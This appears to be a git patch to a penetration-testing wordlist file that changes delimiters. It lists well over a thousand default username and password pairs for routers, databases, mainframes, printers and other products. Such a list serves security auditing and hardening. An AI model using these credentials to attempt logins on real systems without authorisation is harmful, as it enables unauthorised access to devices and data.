+PFCUser +aaa +topicalt +admin2 +1234 +nms +client +sys +field +deskman +SYSADM +superadmin +pmd +GEN2 +ADMN +Factory +PRODDTA +tellabs +spcl +dadmin +helpdesk +dhs3mt +install +adfexc +IntraSwitch +manage +superman +SPOOLMAN +ADVMAIL +vt100 +PSEAdmin +patrol +teacher +PCUSER +Any +RSBCMON +cellit +inads +halt +locate +TMAR#HWMT8007079 +rapport +xbox +device +NICONEX +acc +31994 +bcim +websecadm +blue +topicnorm +supervisor +ccrusr +266344 +telecom +GEN1 +SSA +HTTP +mtch +bciim +browse +hydrasna +deskres +bbsd-client +replicator +intel +radware +intermec +mlusr +init +e250 +Polycom +temp1 +mac +3comcso +RMUser1 +WP +NAU +rcust +mtcl +topicres +bcnas +adminuser +Root +cac_admin +mediator +Anonymous +kermit +volition +GlobalAdmin +LUCENT01 +LUCENT02 +adminstat +desknorm +IntraStack +e500 +deskalt +cust +tiara +bcms +m1122 +telco +xd +dhs3pms +VNC +customer +cisco +adminstrator +ftp_nmc +me +iclock +scmadmin +installer +webadmin +ftp_inst +DDIC +SYSTEM +draytek +EARLYWATCH +super.super +ftp_oper +corecess +weblogic +system/manager +End +d.e.b.u.g +target +MD110 +tiger +adminttd +wlseuser +SAPCPIC +ftp_admi +default.password +7 +2 +ADMIN +itsadmin +PUBSUB +CTXSYS +ftp +bill +192.168.1.1 +setpriv +GUEST +SAP* +t3admin +hello +CISCO15 +1.79 +mso +Telecom +qsysopr +APPS +Developer +mail +qsecofr +11111 +Service +netadmin +any +db2fenc1 +johnson +isp +demos +QSRV +MDSYS +vpasp +TEST +QSECOFR +1 +informix +5 +engmode +scout +qpgmr +ADSL +images +Gearguy +Demo +serial# +BACKUP +stratacom +6.x +mary +COMPANY +SYS +DSL +Jetform +eagle +ROUTER +ods +siteadmin +Alphanetworks +Admin1 +janta +servlet +username +citel +Replicator +SYSMAN +master +SUPERUSER +cn=orcladmin +30 +maintainer +BRIO_ADMIN +internal +CQSCHEMAUSER +DEV2000_DEMOS +FSFTASK1 +checkfs +USER1 +SQLDBA +HELP +toor +qsrvbas +SYSADMIN +EZsetup +BATCH +STRAT_USER +primenet +OEMREP +USER6 +lynx +powerdown +$ALOC$ +password +VOL-0215 +tomcat +REP_MANAGER +WinCCConnect +ALLIN1 +DIRMAINT +eqadmin +QSRVBAS +AQJAVA +LASERWRITER +PERFSTAT +apcuser +MBWATCH +system_admin +unix +OWNER +NETPRIV +VSEMAINT +DEMO +SYMPA +REP_OWNER +DCL +FAX +ARCHIVIST +VTAMUSER +VMTAPE +basisk +NetLinx +OutOfBox +NETMGR +DEFAULT +OAS_PUBLIC +read +AP +MTSSYS +SYSMAINT +AUDIOUSER +Joe +IDMS +$SRV +snake +ROOT +PRINTER +shutdown +satan +RDM470 +trouble +fax +OP1 +admin@example.com +HOST +ADLDEMO +QS_ADM +bin +OPER +oracle +jj +PO7 +www +joe +MAINT +CMSBATCH +CCC +role1 +DATAMOVE +MSHOME +ISPVM +crowd­-openid-­server +user_editor +sedacm +db2admin +Airaya +SYSDUMP1 +IMEDIA +primos_cs +USER_TEMPLATE +pnadmin +lpadmin +VTAM +TRACESVR +POSTMASTER +MAILER +RSCSV2 +QS_WS +circ +nobody +Tasman +DISCOVERER_ADMIN +VMASMON +LR-ISDN +TURBINE +GL +PO +PRINT +MODTEST +GATEWAY +PRIMARY +both +haasadm +pw +games +DOCSIS_APP +bbs +EMP +postmaster +SITEMINDER +vgnadmin +RJE +gonzo +NEWS +AQUSER +UTLBSTATU +netbotz +xmi_demo +ORACACHE +MCUser +prash +sync +PM +AP2SVP +ibm +ULTIMATE +SABRE +user_pricer +SUPERVISOR +EVENT +PORTAL30_SSO_PS +FSFADMIN +OO +WKSYS +OPERATNS +UVPIM_ +OE +OCITEST +web +ESSEX +None +CTXDEMO +user_designer +QDBA +role +LRISDN +tele +WEBCAL01 +rsadmin +OMWB_EMULATION +WINDOWS_PASSTHRU +MOREAU +fast +host +ORDPLUGINS +SYSWRM +savelogs +SDOS_ICSAP +DSSYS +MGWUSER +TDOS_ICSAP +ssp +EJSADMIN +INGRES +DS +estheralastruey +VCSRV +ssladmin +CLARK +OEMADM +restoreonly +quser +MILLER +trmcnfg +REPORT +user_author +dpn +tour +mountfsys +http +PROG +openfiler +RAID +STARTER +FAXUSER +DSA +daemon +mountsys +backuponly +IVPM1 +USER3 +OPENSPIRIT +prime +HPLASER +CSPUSER +qsvr +SYSCKP +Sysop +user_marketer +IMAGEUSER +bsxuser +MASTER +USER9 +OLAPSYS +rje +ODM_MTR +QS_ES +lansweeperuser +DEMO3 +Username +GPLD +uucp +DBSNMP +VMARCH +SWUSER +Operator +CHEY_ARCHSVR +roo +n.a +accounting +backuprestore +dni +WEBADM +iceman +guru +anon +USER8 +PORTAL30_SSO_PUBLIC +postgres +WINSABRE +USERP +IVPM2 +PORTAL30_SSO +ALLIN1MAIL +POST +TEMP +BATCH1 +PROMAIL +SECDEMO +ARAdmin +sadmin +ORAREGSYS +VMASSYS +man +FROSTY +LASER +tutor +DISKCNT +default +SYSERR +WWW +VAX +PROCAL +FAXWORKS +LDAP_Anonymous +(any +setup/snmp +DSGATEWAY +AWARD_SW +CSMIG +umountfsys +VMS +bpel +viewuser +TDISK +politically +user_analyst +RSCS +COMPIERE +OSP22 +guest1 +FORSE +factory +bubba +QUSER +primeos +glftpd +RMAN +mountfs +DIRECT +firstsite +IPFSERV +TSUSER +BATCH2 +snmp +WebAdmin +IBMUSER +SMART +voadmin +BC4J +core +OPERVAX +Bobo +WANGTEK +OWA +USER2 +jasperadmin +VMBSYSAD +PVM +ctb_admin +  +DEMO4 +qsrv +superdba +PORTAL30 +XPRT +Crowd +18364 +ilom-admin +rdc123 +sysopr +tasman +blank +WEBREAD +ODM +11111111 +AURORA$ORB$UNAUTHENTICATED +ADAMS +Craft +rfmngr +SYSTEST_CLIG +user_approver +ilom-operator +Nice-admin +answer +NETNONPRIV +nuucp +CIDS +VASTEST +redline +MBMANAGER +webmaster +APPLSYS +USER4 +hqadmin +UOMNI_ +VMUTIL +uucpadm +EXFSYS +4Dgifts +JMUSER +CIS +UNITY_ +HLW +pwrchute +IDMSSE +NSA +TELEDEMO +recover +TRAVEL +lexar +viewer +LIBRARY +PO8 +root@localhost +NAMES +secofr +PDMREMI +MGE +USER7 +OWA_PUBLIC +questra +builtin +SFCNTRL +boss +PLEX +OLAPDBA +OLAPSVR +user_expert +Bhosda +gropher +TAHITI +NEWINGRES +VM3812 +VIF_DEVELOPER +joeuser +IPC +HELPDESK +wlpisystem +TSAFVM +prtgadmin +UAMIS_ +theman +CISINFO +mobile +QS_CB +CDEMORID +DEMO2 +PORTAL30_PUBLIC +MDDEMO_CLERK +PHANTOM +ODS +BLAKE +TSDEV +PRODBM +dos +APL2PP +god1 +CICSUSER +22222222 +user_publisher +OSE$HTTP$ADMIN +def +SuperUser +QS_CBADM +SYSA +STUDENT +Draytek +SMDR +EREP +VSEMAN +fwadmin +MTS_USER +AQDEMO +private +IS_$hostname +HPSupport +ORASSO +CVIEW +SH +XXSESS_MGRYY +VMMAP +PORTAL30_DEMO +Ezsetup +QS_CS +CMSUSER +DEMO1 +userNotUsed +ncadmin +TESTPILOT +fg_sysadmin +UETP +QS +DBI +JWARD +APPS_MRC +Moe +SENTINEL +Yak +PDP11 +Flo +SLIDE +INFO +checkfsys +PRODCICS +MXAGENT +VMTLIBR +POWERCARTUSER +VMBACKUP +CPNUC +distrib +MIGRATE +CDEMOUCB +OLTSEP +sysbin +signa +autocad +WEBDB +ncrm +SAMPLE +HCPARK +ALLINONE +nm2user +SAVSYS +IIPS +PATROL +mailadmin +TMSADM +ESubscriber +software +god2 +FSFTASK2 +ORDSYS +gopher +PSFMAINT +EAdmin +12345 +DECNET +OPERATIONS +$system +PANAMA +LIBRARIAN +fal +NETSERVER +POWERCHUTE +USER5 +GPFD +QS_OS +REPADMIN +0 +DEMO8 +DEMO9 +CDEMO82 +umountsys +USER0 +CDEMOCOR +SYSTEST +Rodopi +user_checker +qserv +AQ +SAPR3 +VRR1 +fastwire +admi +FINANCE +WinCCAdmin +ESTOREUSER +VIRUSER +LINK +APPLSYSPUB +overseer +checksys +umountfs +DBDCCICS +TOAD +ntpupdate +MDDEMO_MGR +billy-bob +DECMAIL +alien +nsroot +AdvWebadmin +dvstation +SERVICECONSUMER1 +MMO2 +NOC +WWWUSER +SAP +NEVIEW +ODSCOMMON +pixadmin +ripeop +PENG +netlink +L2LDEMO +OUTLN +12.x +scott +dbase +fam +Oper +RMAIL +FND +PRIV +SETUP +news +VSEIPO +ilon +PLSQL +politcally +18140815 +APPUSER +CENTRA +LBACSYS +PDP8 +SFCMI +lpadm +Test +bewan +DIP +mfd +MDDEMO +SWPRO +DES +Coco +GCS +rodopi +Scott +Admin5 +ANDY +DESQUETOP +NETCON +JONES +author +MOESERV +PUBSUB1 +CATALOG +SQLUSER +RE +REPORTS_USER +MFG +HR +VIDEOUSER +DBA +AUTOLOG1 +AURORA$JIS$UTILITY$ +wlcsystem +CPRM From d7bf66973c86910730b88b9a02591bec62e69a49 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 18:13:03 +0200 Subject: [PATCH 334/853] Fixed userpass delimiters. --- .../default_userpass_for_services_unhash.txt | 3574 ++++++++--------- 1 file changed, 1787 insertions(+), 1787 deletions(-) diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt index 8610e57e07..ff0458f94b 100644 --- a/data/wordlists/default_userpass_for_services_unhash.txt +++ b/data/wordlists/default_userpass_for_services_unhash.txt @@ -1,1787 +1,1787 @@ -admin:admin -: -admin: -:admin -admin:password -admin:1234 -root: -Administrator:admin -admin:epicrouter -sysadm:sysadm -:1234 -:password -:access -root:root -tech:tech -:smcadmin -:0 -Administrator: -root:pass -:system -root:admin -:PASSWORD -:Symbol -operator: -guest:guest -admin:bintec -security:security -guest: -debug:synnet -manager:manager -:adtran -admin:motorola -service:smile -:cascade -admin:0 -!root: -user:password -:BRIDGE -netman:netman -super:super -admin:switch -admin:setup -admin:changeme -diag:switch -operator:operator -user:user -user: -Cisco:Cisco -Manager:Manager -DTA:TJM -apc:apc -tech: -:cisco -User: -root:1234 -Admin: -:letmein -cablecom:router -adm: -wradmin:trancell -:ascend -manager:friend -:NetICs -root:blender -netscreen:netscreen -:sysadm -:SKY_FOX -sa: -:public -:Master -setup:setup -root:default -:laflaf -cmaker:cmaker -enable: -MICRO:RSX -login:admin -:Posterie -write:private -root:attack -monitor:monitor -:private -:xdfk9874t3 -netopia:netopia -:Col2ogro2 -admin:microbusiness -op:op -adminview:OCS -op:operator -admin:secure -admin:atlantis -sysadmin:sysadmin -super:5777364 -echo:echo -craft: -adm:cascade -admin:default -maint:maint -comcast:1234 -CSG:SESAME -diag:danger -readonly:lucenttech2 -admin:operator -Manager: -debug:d.e.b.u.g -admin:hello -:SYSTEM -root:ascend -root:calvin -manuf:xxyyzz -cusadmin:highspeed -admin:123 -smc:smcadmin -admin:Sharp -root:password -sweex:mysweex -disttech:4tas -su:super -admin:system -root:changeme -poll:tech -sysadmin:password -SYSDBA:masterkey -anonymous: -:0000 -root:permit -admin:barricade -support:support -root:tslinux -admin:hp.com -recovery:recovery -USERID:PASSW0RD -eng:engineer -administrator:administrator -admin:pwp -admin:isee -NETWORK:NETWORK -JDE:JDE -admin:superuser -Guest: -:Super -admin:admin123 -super:surt -rwa:rwa -admin:123456 -admin:NetCache -:ADTRAN -USER:USER -test:test -admin:extendnet -admin:ironport -lp:lp -:Cisco -administrator: -admin:1111 -sysadmin:PASS -ro:ro -admin:Ascend -:_Cisco -MAIL:MAIL -ami: -:sitecom -hsa:hsadb -system:password -MGR:CAROLIAN -ADMINISTRATOR:ADMINISTRATOR -admin:sysAdmin -root:tini -admin:smcadmin -:Helpdesk -FIELD:SERVICE -PBX:PBX -netman: -HELLO:FIELD.SUPPORT -system:sys -hscroot:abc123 -1502:1502 -:star -superuser:admin -HELLO:MGR.SYS -sysadm:anicust -Administrator:Administrator -netrangr:attack -:Intel -:12345 -readwrite:lucenttech1 -:secret -piranha:piranha -wlse:wlsedb -admin:cisco -l3:l3 -admin:diamond -none:admin -naadmin:naadmin -public:public -admin:1988 -admin:radius -admin:root -NETOP: -Administrator:letmein -HELLO:MANAGER.SYS -:raidzone -:3ascotel -MANAGER:HPOFFICE -demo:demo -:166816 -User:Password -admin:zoomadsl -D-Link:D-Link -user:public -user:pass -l2:l2 -MGR:CCC -rw:rw -cgadmin:cgadmin -storwatch:specialist -:secure -vcr:NetVCR -OPERATOR:COGNOS -piranha:q -admin:synnet -MDaemon:MServer -root:cms500 -root:davox -jagadmin: -enquiry:enquirypw -at4400:at4400 -support:h179350 -davox:davox -admin:asd -PFCUser:240653C9467E45 -setup:changeme -superuser:superuser -:atc123 -aaa: -root:admin_1 -:266344 -MGR:WORD -topicalt:password -admin2:changeme -1234:1234 -MANAGER:ITF3000 -:connect -FIELD:HPONLY -nms:nmspw -client:client -admin:comcomcom -:speedxess -MGR:ROBELLE -:epicrouter -sys:uplink -OPERATOR:SYSTEM -field:support -MGR:SYS -root:letacla -:FORCE: -deskman:changeme -MAIL:REMOTE -SYSADM:sysadm -superadmin:secret -:backdoor -pmd: -MGR:CNAS -admin:22222 -GEN2:gen2 -:medion -ADMN:admn -Factory:56789 -PRODDTA:PRODDTA -tellabs:tellabs#1 -spcl:0 -dadmin:dadmin01 -:comcomcom -administrator:password -helpdesk:OCS -dhs3mt:dhs3mt -MGR:SECURITY -setup:changeme! -install:llatsni -adfexc:adfexc -IntraSwitch:Asante -manage:!manage -superman:21241036 -MANAGER:TELESUP -craft:crftpw -login:0 -:help -MGR:HPOFFICE -:lantronix -SPOOLMAN:HPOFFICE -manager:admin -:netadmin -ADVMAIL:HP -FIELD:SUPPORT -MANAGER:SYS -MGR:VESOFT -vt100:public -PSEAdmin:$secure$ -HELLO:OP.OPERATOR -Manager:friend -:hs7mwxkk -patrol:patrol -:SUPER -:SMDR -:1064 -teacher:password -PCUSER:SYS -MGR:ITF3000 -Any:12345 -OPERATOR:DISC -RSBCMON:SYS -cellit:cellit -MGR:INTX3 -inads:inads -halt:tlah -root:wyse -locate:locatepw -admin:visual -TMAR#HWMT8007079: -rapport:r@p8p0r+ -MGR:TELESUP -xbox:xbox -:TENmanUFactOryPOWER -device:device -NICONEX:NICONEX -admin:admin1234 -root:fivranne -acc:acc -31994:31994 -admin:netadmin -bcim:bcimpw -websecadm:changeme -blue:bluepw -topicnorm:password -supervisor:PlsChgMe -:R1QTPS -MGR:HPONLY -ccrusr:ccrusr -root:Cisco -login:password -266344:266344 -MAIL:MPE -telecom:telecom -MAIL:HPOFFICE -GEN1:gen1 -Administrator:smcadmin -SSA:SSA -:snmp-Trap -HTTP:HTTP -:default -mtch:mtch -admin:adslolitec -Administrator:ganteng -bciim:bciimpw -browse:browsepw -Admin:Admin -:Password -hydrasna: -sys:change_on_install -deskres:password -bbsd-client:changeme2 -anonymous:Exabyte -admin:rmnetlm -replicator:replicator -intel:intel -OPERATOR:SUPPORT -MGR:HPP196 -radware:radware -intermec:intermec -mlusr:mlusr -MGR:RJE -FIELD:LOTUS -init:initpw -e250:e250changeme -MAIL:TELESUP -Polycom:SpIp -temp1:password -:adminttd -tech:field -support:supportpw -mac: -:MiniAP -MANAGER:SECURITY -3comcso:RIP000 -RMUser1:password -WP:HPOFFICE -Administrator:changeme -MGR:XLSERVER -MGR:HPP187 -MGR:HPP189 -inads:indspw -admin:linga -craft:craft -:enter -NAU:NAU -rcust:rcustpw -admin:AitbISP4eCiG -mtcl:mtcl -MGR:CONV -topicres:password -bcnas:bcnaspw -MGR:NETBASE -admin:access -public: -adminuser:OCS -MGR:REGO -Root: -cac_admin:cacadmin -mediator:mediator -superman:talent -Anonymous: -kermit:kermit -admin:x-admin -MGR:HPDESK -:9999 -root:ROOT500 -admin:my_DEMARC -volition:volition -GlobalAdmin:GlobalAdmin -:4getme2 -LUCENT01:UI-PSWD-01 -admin:2222 -LUCENT02:UI-PSWD-02 -MANAGER:TCH -adminstat:OCS -desknorm:password -IntraStack:Asante -OPERATOR:SYS -MGR:COGNOS -:Fireport -:ILMI -maint:maintpw -supervisor:supervisor -e500:e500changeme -admin:mu -MANAGER:COGNOS -deskalt:password -admin:OCS -bbsd-client:NULL -cust:custpw -admin:noway -tiara:tiaranet -bcms:bcmspw -:TANDBERG -m1122:m1122 -telco:telco -superuser: -xd:xd -dhs3pms:dhs3pms -VNC:winterm -craft:craftpw -maint:rwmaint -anonymous:any@ -login:access -browse:looker -customer:none -cisco:cisco -adminstrator:changeme -FIELD:MANAGER -:1234admin -FIELD:MGR -ftp_nmc:tuxalize -me: -iclock:timely -echo:User -ADVMAIL:HPOFFICE:DATA -login:1111 -login:8429 -Administrator:manage -:Babylon -admin:hagpolm1 -root:12345 -scmadmin:scmchangeme -user:tivonpw -sysadm:Admin -Administrator:password -admin:administrator -installer:installer -webadmin:webadmin -ftp_inst:pbxk1064 -DDIC:19920706 -:pento -admin:NetSurvibox -SYSTEM:D_SYSTPW -draytek:1234 -:3477 -operator:$chwarzepumpe -administrator:asecret -EARLYWATCH:SUPPORT -:10023 -Manager:Admin -super.super: -ftp_oper:help1954 -corecess:corecess -superuser:123456 -admin:Password -super.super:master -admin:Protector -SYSTEM:MANAGER -webadmin:1234 -install:secret -FIELD:HPWORD:PUB -admin:12345 -admin:symbol -weblogic:weblogic -Admin:1988 -system/manager:sys/change_on_install -root:3ep5w2u -:8111 -:jannie -End:User:123 -none:0 -d.e.b.u.g:User -admin:tomcat -target:password -Administrator:pilou -MD110:help -Administrator:3ware -:ANYCOM -tiger:tiger123 -adminttd:adminttd -admin:asante -admin:smallbusiness -admin:netscreen -FIELD:HPP187:SYS -guest:User -maint:ntacdmax -admin:w2402 -wlseuser:wlsepassword -SAPCPIC:admin -ftp_admi:kilo1987 -admin:articon -mtcl: -default.password: -admin:michelangelo -manager:changeme -root:Mau'dib -:Serial:Num -root:ggdaseuaimhrke -7:maintain -2:syslib -ADMIN:admin -system:weblogic -Administrator:ggdaseuaimhrke -ADMIN: -itsadmin:init -PUBSUB:PUBSUB -admin:demo -system:manager -sys:sys -CTXSYS:CTXSYS -ftp: -bill:bill -192.168.1.1:60020:@dsl_xilno -FIELD: -admin:dmr99 -setpriv:system -GUEST:GUEST -SAP*:06071992 -operator:1234 -t3admin:Trintech -hello:hello -supervisor: -CISCO15:otbu+1 -1.79:Multi -:babbit -mso:w0rkplac3rul3s -Telecom:Telecom -qsysopr:qsysopr -admin:TANDBERG -admin:imss7.0 -:nokia -APPS:APPS -Developer:isdev -mail:mail -admin:draadloos -qsecofr:qsecofr -11111:x-admin -:default.password -Service:5678 -enable:cisco -netadmin:nimdaten -Polycom:456 -admin:P@55w0rd! -admin:1234admin -root:par0t -any:system -db2fenc1:db2fenc1 -johnson:control -2:maintain -isp:isp -demos: -QSRV:QSRV -root:iDirect -MDSYS:MDSYS -Admin:123456 -2:manager -vpasp:vpasp -TEST:TEST -:Telecom -QSECOFR:QSECOFR -adm:none -:2501 -1:syslib -system:security -admin:leviton -!root:blank -informix:informix -root:mpegvideo -5:games -root:0P3N -engmode:hawk201 -scout:scout -qpgmr:qpgmr -admin:admin000 -ADSL:expert03 -cisco: -images:images -admin:security -admin:surecom -Gearguy:Geardog -:symantec -comcast: -admin:adslroot -1:manager -Demo: -:xyzzy -Administrator:adaptec -system:system -SAP*:PASS -serial#:serial# -BACKUP:BACKUP -stratacom:stratauser -root:rootme -6.x: -root:!root -webadmin:webibm -:riverhead -mary:password -COMPANY:COMPANY -SYS:SYS -DSL:DSL -Jetform: -none:amber -eagle:eagle -ROUTER: -root:brightmail -admin:pass -:HEWITT:RAND -ods:ods -siteadmin:toplayer -admin:OkiLAN -root:rootpass -Alphanetworks:wrgg15_di524 -:x40rocks -:nokai -Admin1:Admin1 -field:field -Admin:admin -Admin:ImageFolio -:iolan -:manager -admin:pfsense -janta:sales:janta211 -servlet:manager -username:password -citel:password -Replicator:iscopy -SYSMAN:OEM_TEMP -1:operator -SYSTEM:SYSTEM -administrator:RSAAppliance -master:themaster01 -Admin:1234 -2:operator -SUPERUSER:ANS#150 -admin:passwort -cn=orcladmin:welcome -30:games -maintainer:admin -setup: -:hello -admin:NetSeq -BRIO_ADMIN:BRIO_ADMIN -:citel -internal:oracle -CQSCHEMAUSER:PASSWORD -root:kn1TG7psLu -SYS:SYSPASS -:lkwpeter -DEV2000_DEMOS:DEV2000_DEMOS -FSFTASK1: -checkfs:checkfs -BACKUP: -USER1:USER1 -root:TENmanUFactOryPOWER -SQLDBA: -root:resumix -HELP:HELP -toor:logapp -SYS:0RACLE9 -SYS:0RACLE8 -:57gbzb -!root:none -qsrvbas:qsrvbas -SYSADMIN: -EZsetup: -Administrator:1234 -:sldkj754 -BATCH: -STRAT_USER:STRAT_PASSWD -Administrator:19750407 -:User -user:USERP -primenet:primeos -OEMREP:OEMREP -admin:[^_^] -USER6:USER6 -lynx: -:TTPTHA -powerdown:powerdown -root:Mau’dib -SYSTEM:ORACL3 -$ALOC$: -password: -VOL-0215: -admin:nimda -tomcat:tomcat -REP_MANAGER:DEMO -WinCCConnect:2WSXcder -ALLIN1:ALLIN1 -DIRMAINT: -eqadmin::Serial:port:only:equalizer -sysadm:sysadmpw -QSRVBAS:QSRVBAS -admin:ip305Beheer -debug:tech -:ACCORD -AQJAVA:AQJAVA -LASERWRITER:LASERWRITER -Administrator:0000 -root:nsi -PERFSTAT:PERFSTAT -apcuser:apc -MBWATCH:MBWATCH -:protection -system_admin: -unix:unix -OWNER:OWNER -NETPRIV:NETPRIV -VSEMAINT: -:AWARD?SW -DEMO:DEMO -tomcat:changethis -SYMPA:SYMPA -REP_OWNER:REP_OWNER -DCL:DCL -FAX: -root:dbps -ARCHIVIST:ARCHIVIST -USER:PASSWORD -VTAMUSER: -LASERWRITER: -VMTAPE: -basisk:basisk -NetLinx:password -OutOfBox:demos:guest:4DGifts:(none:by:default) -none:letmein -NETMGR:NETMGR -DEFAULT:USER -OAS_PUBLIC:OAS_PUBLIC -read: -AP:AP -demos:demos -SYSTEM:Admin -admin:j5Brn9 -MTSSYS:MTSSYS -SYSMAINT:DIGITAL -AUDIOUSER:AUDIOUSER -Joe:hello -IDMS: -:teX1 -admin:allot -$SRV:$SRV -snake: -SYS:0RACLE -ADVMAIL: -Administrator:nicecti -ROOT:ROOT -PRINTER:PRINTER -shutdown: -satan: -:m1link -RDM470: -master:access -:l2 -:l1 -trouble:trouble -fax: -OP1: -admin@example.com:admin -root:trendimsa1.0 -HOST:HOST -ADLDEMO:ADLDEMO -QS_ADM:QS_ADM -bin:sys -:AMI -OPER:OPER -oracle: -jj: -PO7:PO7 -SYSTEM:0RACLE8 -SYSTEM:0RACLE9 -www: -joe:password -:komprie -:123 -MAINT:MAINT -CMSBATCH: -root:toor -CCC: -role1:tomcat -DATAMOVE: -lp: -:AMISETUP -:sp99dd -halt:halt -MSHOME:MSHOME -ISPVM: -crowd­-openid-­server:password -user_editor:demo -sedacm:secacm -ROOT: -Admin:3Com -db2admin:db2admin -Airaya:Airaya -supervisor:visor -none:Wireless -SYSDUMP1: -IMEDIA:IMEDIA -:Biostar -install:install -primos_cs:primos -admin:infrant1 -Administrator:Partner -:Administrative -USER_TEMPLATE:USER_TEMPLATE -pnadmin:pnadmin -:h6BB -lpadmin:lpadmin -guest:none -VTAM:VTAM -TRACESVR:TRACE -POSTMASTER:POSTMASTER -MAILER:MAILER -RSCSV2: -QS_WS:QS_WS -:sma -system_admin:system_admin -circ: -Demo:password -:rwa -nobody:nobody -Tasman:Tasmannet -admin:!admin -DISCOVERER_ADMIN:DISCOVERER_ADMIN -VMASMON: -LR-ISDN:LR-ISDN -TURBINE:TURBINE -GL:GL -PO:PO -:AMI_SW -super:superpass -PRINT: -MODTEST:YES -GATEWAY:GATEWAY -root:system -PRIMARY:PRIMARY -both:tomcat -:award.sw -haasadm:lucy99 -pw:pwpw -games:games -DOCSIS_APP:3Com -bbs: -EMP:EMP -Admin:cclfb -postmaster: -SITEMINDER:SITEMINDER -Any:Any -vgnadmin:vgnadmin -RJE:RJE -gonzo: -NEWS:NEWS -sa:Ektron -:Award -AQUSER:AQUSER -UTLBSTATU:UTLESTAT -:AMIAMI -netbotz:netbotz -CTXSYS:CHANGE_ON_INSTALL -xmi_demo:sap123 -:Crystal -:Daewuu -ftp:ftp -ORACACHE:(random:password) -MCUser:MCUser1 -prash:hello -sync: -sysadm:admpw -root:rootadmin -PM:PM -AP2SVP: -master:master -ibm:2222 -ULTIMATE:ULTIMATE -SABRE: -role1:role1 -user_pricer:demo -admin:enhydra -SUPERVISOR:NF -EVENT:EVENT -:xyzall -:rainbow -ADMIN:JETSPEED -SYS:ORACL3 -PORTAL30_SSO_PS:PORTAL30_SSO_PS -FSFADMIN: -OO:OO -WKSYS:WKSYS -OPERATNS:OPERATNS -:ksdjfg934t -UVPIM_: -:merlin -OE:OE -Any:Local:User:Local:User:password -OCITEST:OCITEST -web: -:HLT -ADMINISTRATOR:admin -ESSEX: -:last -CTXSYS: -None:xyzzy -CTXDEMO:CTXDEMO -user_designer:demo -:Admin -:zebra -QDBA:QDBA -role:changethis -LRISDN:LRISDN -tele:tele -WEBCAL01:WEBCAL01 -rsadmin:rsadmin -OMWB_EMULATION:ORACLE -root:alien -WINDOWS_PASSTHRU: -:sanfran -public:ReadOnly:access:secret -:AMIPSWD -MOREAU:MOREAU -fast:abd234 -root:QNX -host:dnnhost -administrator:root -admin:public -SYSTEM:ORACLE -:sertafu -ORDPLUGINS:ORDPLUGINS -SYSWRM: -mail: -:telos -ADMIN:ADMIN -administrator:adminpass -savelogs:crash -:ACCESS -SDOS_ICSAP:SDOS_ICSAP -system:adminpwd -BATCH:BATCH -GUEST:GUESTGUEST -SYSMAINT:SYSMAINT -postmaster:postmast -DSSYS:DSSYS -:award_ps -:ZAAADA -MGWUSER:MGWUSER -:NTCIP -OPERATOR: -:hewlpack -TDOS_ICSAP:TDOS_ICSAP -ssp:ssp -EJSADMIN:EJSADMIN -:damin -INGRES:INGRES -DS: -:A.M.I -estheralastruey: -:1322222 -VCSRV:VCSRV -Administrator:storageserver -ssladmin:ssladmin -CLARK:CLOTH -shutdown:shutdown -administrator:1234 -OEMADM:OEMADM -restoreonly:restoreonly1 -quser:quser -PRINTER: -MILLER:MILLER -trmcnfg:trmcnfg -REPORT:REPORT -user_author:demo -:aLLy -dpn:changeme -tour:tour -mountfsys:mountfsys -http: -PROG:PROG -:iwill -openfiler:password -:Public -admin:mp3mystic -RAID:hpt -read:synnet -admin:peribit -STARTER:STARTER -FAXUSER: -GUEST:GUESTGUE -DSA: -:guardone -daemon:daemon -mountsys:mountsys -SYSTEM:ORACLE9 -SYSTEM:ORACLE8 -:gandalf -backuponly:backuponly1 -IVPM1: -:leaves -sysadm:syspw -root:blablabla -:Compleri -USER3:USER3 -OPENSPIRIT:OPENSPIRIT -:spooml -:changeit -:wg -prime:primeos -HPLASER: -:Vextrex -CSPUSER: -qsvr:qsvr -lynx:lynx -SYSCKP: -root:letmein -Sysop:Sysop -user_marketer:demo -IMAGEUSER:IMAGEUSER -root:Password -bsxuser:bsxpass -MASTER:PASSWORD -USER9:USER9 -root:ax400 -OLAPSYS:MANAGER -SYSTEM:OPERATOR -oracle:oracle -root:Mau?dib -:MASTER -root:t00lk1t -rsadmin: -:Daytec -OutOfBox: -:SZYX -:cmaker -:CTX_123 -rje:rje -ODM_MTR:MTRPW -QS_ES:QS_ES -lansweeperuser:mysecretpassword0* -DEMO3: -Username:password -GPLD:GPLD -uucp:uucp -DBSNMP:DBSNMP -VMARCH: -GUEST:TSEUG -SWUSER:SWUSER -root:8RttoTriz -VTAM: -OPERATNS: -Operator:Operator -CHEY_ARCHSVR: -SYS:ORACLE -roo:honey -n.a:guardone -accounting:accounting -backuprestore:backuprestore1 -PRINT:PRINT -:j322 -:Craftr4 -dni:dni -WEBADM:password -iceman: -guru:*3noguru -FAX:FAX -anon:anon -:j256 -USER8:USER8 -root:honey -PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC -:589721 -postgres: -WINSABRE:WINSABRE -USERP:USERP -none:public -Admin:shs -SYS:MANAGER -IVPM2: -PORTAL30_SSO:PORTAL30_SSO -ALLIN1MAIL:ALLIN1MAIL -POST: -TEMP: -:xo11nE -admin:nms -SYSADM:SYSADM -BATCH1: -me:me -SUPERVISOR:NFI -PROMAIL: -SECDEMO:SECDEMO -ARAdmin:AR#Admin# -sadmin: -ORAREGSYS:ORAREGSYS -VMASSYS: -man: -FROSTY:SNOWMAN -LASER:LASER -tutor: -:?award -root:changethis -DISKCNT: -default:WLAN_AP -SYSERR: -WWW:WWW -VAX:VAX -none:none -:Cable-docsis -PROCAL: -SUPERVISOR:SYSTEM -FAXWORKS: -ibm:password -CTXSYS:UNKNOWN -LDAP_Anonymous:LdapPassword_1 -(any:3:chars):cascade -games: -User:1234 -:Zenith -setup/snmp:setup/nopasswd -DSGATEWAY:DSGATEWAY -AWARD_SW: -CSMIG:CSMIG -:year2000 -umountfsys:umountfsys -:BIGO -root:jstwo -VMS:VMS -dni: -bpel:bpel -viewuser:viewuser1 -admin:ISPMODE -TDISK: -politically:correct -user_analyst:demo -admin:conexant -guest:1234 -root:logapp -admin:ip3000 -RSCS: -COMPIERE:COMPIERE -OSP22:OSP22 -guest1:guest1 -FORSE:FORSE -:lesarotl -factory:factory -bubba:(unknown) -admin:ip20 -admin:ip21 -LASER: -QUSER:QUSER -:AWARD:SW -primeos:prime 